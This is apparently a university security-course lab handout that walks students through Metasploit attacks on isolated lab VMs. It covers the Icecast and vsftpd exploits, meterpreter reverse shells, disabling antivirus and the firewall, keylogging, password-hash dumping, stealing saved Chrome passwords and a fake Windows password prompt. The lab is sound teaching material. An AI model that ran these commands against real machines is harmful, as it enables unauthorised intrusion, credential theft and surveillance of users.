Temple MIS



Lab 7: ExploitationName:In this lab you will use Metasploit and the Nessus vulnerability reports you created to exploit and take control of the Windows 10 and Metasploitable VMs you scanned in the previous lab.Metasploit is the industry’s most popular exploitation tool. According to :Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their?list of modules. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. One free extra is?Metasploitable, an intentionally insecure Linux virtual machine you can use for testing Metasploit and other exploitation tools without hitting live servers.Metasploit was completely free, but the project was acquired by?Rapid7?in 2009 and it soon sprouted commercial variants. The Framework itself is still free and open source, but they now also offer a free-but-limited Community edition, a more advanced Express edition ($5,000 per year per user), and a full-featured Pro edition. Other paid exploitation tools to consider are?Core Impact?(more expensive) and?Canvas?(less).Metasploit InterfacesThe Metasploit framework has a variety of different interfaces, including the command line tool mcli and meterpreter, an interface designed to interact with compromised computers. You can even work from an interactive Ruby programming language interpreter within Metasploit (Metasploit is written in Ruby). However, the most popular interface, and the one we will use chiefly in this lab, is msfconsole. Msfconsole is an interactive environment that allows you to scan hosts, test and launch exploits, and build and deploy payloads.TerminologyBelow is a list of common terminology relating to Metasploit, taken (with some adaptation) from Metasploit: The Penetration Tester’s Guide, by Kennedy et al.ExploitThe means by which an attacker takes advantage of a flaw within a system, an application or service. An exploit results in a particular outcome unintended by the original developer. Common exploits include buffer overflows, web application vulnerabilities (like SQL injection), and configuration errors. PayloadCode that the attacker wants the system to execute and that is selected and delivered by Metasploit. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a command prompt, whereas a bind shell is a payload that “binds” a command prompt to a listening port on the target machine, to which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.ModuleA module in the context of Metasploit is a piece of software that can be used by Metasploit. At times, you may require the use of an exploit module, a software component that conducts the attack. Other times, an auxiliary module may be required to perform an action such as scanning or system enumeration. These interchangeable modules are the core of what makes Metasploit so powerful.ListenerA component within Metasploit that waits for an incoming connection of some kind. For example, after the target machine has been exploited, it may call the attacking machine over the Internet. The listener handles that connection, waiting on the attacking machine to be contacted by the exploited mon Commands within MsfconsolehelpLists available commands.show exploitsShows all available exploits in the Metasploit framework. New exploits are constantly being developed and incorporated into the framework.show auxiliaryShows auxiliary modules within Metasploit framework.searchSearches exploit and auxiliary modules for one or more terms. For those familiar with grep, the search function works the same way.use [module]Loads a Metasploit module. The back command exits the module.backExits the current module.show optionsWithin a particular module, show options displays the required and optional configurations that the module uses.show payloadsWithin a module, show payloads displays all the payloads that are available to use with the module.show targetsWithin a module, list targets shows OS versions that are vulnerable to the Within a module, info shows additional information about the module.set/unsetSets an environment variable used as an option specific to a particular module.setg/unsetgSets a global environment variable used as an option that applies across modules.saveSaves the current global options so they are available the next time you run msfconsole.Prepare the Windows 10 VMUse the Windows 10 lab VM for Part 1 of this lab.Open Windows Defender and turn off real-time protection. To do this:Double-click the “disable-defender.ps1” script on the Windows 10 VM desktop.Alternatively, to do this manually:Click the Windows button on the bottom left of the desktop and searching for ‘Defender’ and choose ‘Windows Defender Security Center.’Click ‘Virus & Threat protection settings.’Move the ‘Real-time protection’ slider to the left.Turn off Windows Firewall. Open CMD with administrative privileges by typing in “cmd” in the Windows search field. Right-click the “Command Prompt” icon, and select “Run as administrator.” Once the command prompt opens, enter the following command:netsh advfirewall set allprofiles state offConfigure Kali Linux VMBoot your Kali VM, and login as user root and password toor.Open a terminal and try to ping the IP address of the Windows 10 VM, which is 192.168.55.100. You can verify this IP address in Windows by typing “ipconfig” from the command prompt.Finally, from the Windows 10 VM, ensure that you can ping the Kali Linux VM at 192.168.55.101. You can verify this IP address in Linux by typing “ifconfig” (note the “f”).If you are successful in pinging the VM in both directions, then you are ready to continue the lab. If not, make sure that each VM is connected to the?infosec-net?network by using?“ifconfig”. Also, make sure that the firewall is down on Windows 10 following the steps above.Start Icecast on Windows 10Icecast is a media streaming sever that was vulnerable to a buffer overflow attack in versions 2.01 and earlier?see the exploit information here. Old versions of Icecast can be found?here. For this section of the lab, you will run a vulnerable version of the Icecast server.On Windows 10 desktop, right-click the “Icecast2 Win32” icon. Select “run as administrator,” and click “yes” on the warning message the pops up.In the Icecast window, click the button “Start server.”Part 1. Metasploit Exploit Walkthrough Using the Icecast VulnerabilityBoot your Kali VM, and login as user root and password toor.Install two packages you’ll need for this lab:apt install mirageapt install xtightvncviewerThen type rebootAfter logging back into Kali, from the terminal, enter:service postgresql startFrom the terminal, enter:msfconsoleYou should see a “msf >” prompt appear. This is the Metasploit command line.Use NMAP to scan the Windows 10 VM and check the version of available service:nmap -sV 192.168.55.100Notice that the Icecast server is listening on port 8000.From the?msf >?prompt, try:search icecastIf the output tells you that you are using “slow search”, then cancel with?ctrl+c, and run the following from the?msf >?prompt:msfdb initdb_connectdb_rebuild_cacheThis will allow you to search for Metasploit exploit and auxiliary modules. It may take some time before the search cache is ready. You can still use “slow search” meanwhile.In the search output, you should see an exploit related to?Icecast?called?“exploit/windows/http/icecast_header.” Use it:use exploit/windows/http/icecast_headerNote: you can press the tab key within Metasploit to complete a module or command name you are typing. This makes entering commands in Metasploit faster. If you push the tab key twice it will show you all possible options directory you are in.Your msfconsole prompt should now look like this:msf exploit(icecast_header) > To get more information about this module, type info. This module has been rated “great,” meaning it is very effective and reliable. Besides providing a better description, the info command shows the targets that the module is effective against, as well as options to set.To show available options, type show options.Let’s set the required options. First, we’ll set the remote host to the IP address of your Windows 10 VM: set rhost 192.168.55.100Type show options again to see that the RHOST variable has been set.Next, let’s look at available payloads for this exploit: show payloadsWe have a lot of options for this module. We’ll use one of the most popular and reliable payloads. Type: set payload windows/meterpreter/reverse_tcpThis payload will open a reverse TCP connection from the exploited Windows 10 VM back to the Kali VM.Type show options again to see the options that are required for this payload.To set the local host variable of the IP address of your Kali VM, type:set lhost 192.168.55.101Note: you can easily check your IP in Unix/Linux by typing ifconfig from within Metasploit. Type show options to see that the variable has been set.With all options set, now it’s time to launch the exploit. Type exploit.You should now be presented with the “meterpreter >” prompt. If you see this, then congratulations! You’ve exploited your first remote host. Laugh maniacally.Now that we have access, let’s run a few commands to give you an idea of the power of the meterpreter interface. Type sysinfo to see information about the compromised system.Type getuid to see the system user you now control.Escalate your privileges by typing getsystem. Type getuid again. You should see that you have “NT AUTHORITY\SYSTEM,” which means you administrator privileges.Type:?run post/windows/manage/killavThis stops anti-virus processes that might limit our attacks on the machine.You can execute commands on the victims host from within Meterpreter. For example, type:execute -f cmd.exe -c This will launch cmd.exe on the victim’s machine. You can hide the command window from being shown on the victim machine by using the “-h” option.The “-c” option “channelizes” the cmd.exe, which means that meterpreter can continue interacting with it. Notice the message that “Channel 1 was created.”Interact with cmd.exe by typing: channel -i 1. Use the dir, cd, and cd .. commands to browse around the file system. Type exit to return to meterpreter.Since opening a command prompt is such a common action, you can simply type shell to open a hidden command prompt. Type exit to return to meterpreter.Type screenshot to capture a screenshot of the current GUI. A jpeg file should be saved to /root. You can view the image (outside of meterpreter) by running the mirage viewer:mirage [image name]Control the mouse in Windows using VNC. From meterpreter, type background or cntl + z. This sends the current meterpreter session to the background so you can do more things in the Metasploit console.Now set the icecast exploit to use a VNC payload:?set payload windows/vncinject/reverse_tcpType show options. Change the “View Only” option to false:?set ViewOnly falseRun the exploit again with the new VNC payload by typing exploit.A new window will open on Kali Linux that will let you control the Windows VM using the mouse. Trying moving a window on the Windows VM and then close the VNC window on the Kali VM.Type show options. Get the session number for your meterpreter session by typing, sessions -l (that’s a lowercase “L”). Note the ID number of your meterpreter session. To interact with your meterpreter session again, type sessions -i [ID] where “ID” is the number of your meterpreter session.Start a keylogger on the victim’s computer. Type keyscan_start. From the Windows 10 machine, open Notepad.exe and type some words. Back in meterpreter, type keyscan_dump. You should see the text you typed in Notepad on the Windows 10 VM. To stop the keylogger, type keyscan_stop.Download a file. Type ls to see a listing of files in the current directory. Use Notepad to create a text document on the Desktop of the Windows 10 machine. Use the cd command within Meterpreter to browse to the desktop. Type download [filename] to download the text document you just created to the Kali VM. The file should be saved to the Kali VM at /root.Disable the keyboard and mouse in the Windows VM:uictl disable allTry to type or move the mouse in Windows. To re-enable the keyboard and mouse, type:uictl enable allAnnoy the user. Background the meterpreter session by typing, background or ctrl + z. Then type:use post/multi/manage/play_youtubeType show options. Get the session number for your meterpreter session by typing, sessions -l (that’s a lowercase “L”). Note the ID number of your meterpreter session. Type, set session [ID], where [ID] is the session number you just identified. Type set vid DLzxrzFCyOs. Type run.On Windows, you can close the window by typing, control + w. If you were mean, you could pair this trick with the disabling the keyboard and mouse on the victim’s computer in the previous step.To interact with your meterpreter session again, type sessions -i [ID] where “ID” is the number of your meterpreter session identified above.Now that you are running off of a system process, you can now obtain the password hashes for the machine by typing hashdump. These hashes can be readily cracked using a password cracker like Hashcat (covered in the password cracking lab). For now, we’ll use Google to crack the password hash for user labuser.Note: hashdump command outputs hashes in the following format:username:SID:LANMAN hash:NTLM hash:::For example:Frank:1000:3A956F63F23DAC7236077A718CCDF409:C1F1B7BDB01896908C80A0A67062BF24:::Copy the NTLM hash, open Firefox and paste into Google or the NTLM hash of labuser to find out the password.Question: What is the NTLM hash of ?WDAGUtilityAccount?You can migrate meterpreter from the current exploited process to another, more permanent process that is at less risk of being closed down. In this example, you can migrate from the exploited Icecast process to a more permanent process so that you are not at risk of losing your access to the system if Icecast is terminated.Type ps -S Icecast (note the capital ‘S’ and capital ‘I’) to search for processes with the name of “icecast.” Note the process ID. Next, type getpid to get the process that meterpreter is running off of. It should be the same process ID as Icecast.Type ps to see a list of running processes. Type ps -S explorer.exe to find the process ID for “explorer.exe,” which is ;part of the Windows login system. Note that it also has “System” authority. Type migrate [PID for explorer.exe]. Type getpid again to verify that you are now running off of the “explorer.exe” process. Now your connection to the Windows 10 VM will persist until it is rebooted or powered off.Finally, on your Windows VM, close the Icecast window. Your meterpreter session should still be running.Extract the user’s passwords saved in Chrome.In Windows, open Chrome and attempt to log in to a website (like tuportal.temple.edu) with a your first and last name, and any password (but not something you actual use!). Without actually signing in, click the key symbol to the right of the URL bar, and select “Save.”Background the meterpreter session by typing, background or ctrl + z. Then type:use post/windows/gather/enum_chromeGet the session number for your meterpreter session by typing, sessions -l (that’s a lowercase “L”). Note the ID number of your meterpreter session. Type, set session [ID], where [ID] is the session number you just identified.Type show options to make sure you have all of the required options set, then type run to execute the post module. You should see something like the following:Type:cat /root [the path to the chrome.decrypted txt file]You should now see the Chrome password you saved.Question: Upload to Canvas a screenshot of the output above containing your name as the user name, like the following: Prompt the Windows user for their password. Type:?use post/windows/gather/phish_windows_credentialsType show options. Get the session number for your meterpreter session by typing, sessions -l (that’s a lowercase “L”). Note the ID number of your meterpreter session. Type, set session [ID], where [ID] is the session number you just identified.?Type:set description “explorer.exe needs your password to run."On Windows, you should see a prompt like the following:This prompt will not go away until you type in the actual password for labuser, which is Password1. Type in the password.On Kali, you should now see the password in cleartext.To see other Meterpreter commands, type help.When you’re finished, type exit to close the Meterpreter session.Part 2. Metasploitable2 DiscoveryFor Part 2 of the lab, start the Metasploitable2 VM (see Lab 6 for the download link and set up instructions).Check which ports are open on the Metasploitable2 VM:nmap -sV 192.168.55.102Note that the service “vsftpd” is running on port 21. In the Kali VM, type search vsftpd in Metasploit to find an exploit for vsftpd. Launch the exploit. You should see something like the following:This means that you have the user account with the user ID of 0 (root), which means you have full administrative privileges.Notice that there is no “$” symbol at the prompt. However, if you type ls, pwd, id, or other commands, you can see that you have a shell, although one with limited interactivity (colloquially called a “jail shell” because of it’s limited abilities). To confirm this, type tty. If it says “not a tty,” then you have a limited jail shell. If it says, “tty /dev/…”, then you have a fully interactive shell. You can upgrade your shell in at least two ways, as follows.Type:python -c "import pty; pty.spawn('/bin/sh’);Note: the quotes above are need for the command.If you type tty now, it should say something like: “?/dev/pts/1”. This means you now have a full featured shell.Convert your shell to a meterpreter, which includes many of the powerful features you learned in the previous section. First, background your session.Type:?use post/multi/manage/shell_to_meterpreterType show options. Set the needed options, including the session number for the backgrounded session. Launch the post module.Connect to the newly created meterpreter session. Type help inside the meterpreter to see what commands are available to you on the Metasploitable2 Linux VM.Dump the hash from Metasploitable2:Background the meterpreter session.Type:?use post/linux/gather/hashdumpSet the options and run. This command combines the user information in /etc/passwd with the password and salt in /etc/shadow password files so you can use hashcat to or John the Ripper to crack the password hashes.View the hashes by using the cat command against the new file just created in /root/.msf4/loot.Question: What is the salt and hash for the Postgres user? For example, the salt and hash for msfadmin is:?msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/Use your Nessus report to identify promising exploits and compromise or get information from Metasploitable 2 using at least two more exploit or auxiliary modules. If you get stuck, feel free to look up a walkthrough for help (many exist). For example, you could use?this page.DeliverablesQuestion: Attach a screenshot for each of the two successful exploits you performed and upload them to Canvas.Learn MoreTo learn more about Metasploit, see the following resources:News article about one of the most popular and powerful Metasploit modules, Mimikatz: Metasploit Unleashed (). This is an excellent online Metasploit tutorial.Metasploit: The Penetration Tester’s Guide, by Kennedy, O’Gorman, Kearns, and Aharoni. Considered by many to be the best book on Metasploit.Nice collection of Metasploit video tutorials: official Metasploit website: account for the Metasploit project: ................
................

In order to avoid copyright disputes, this page is only a partial summary.

Google Online Preview   Download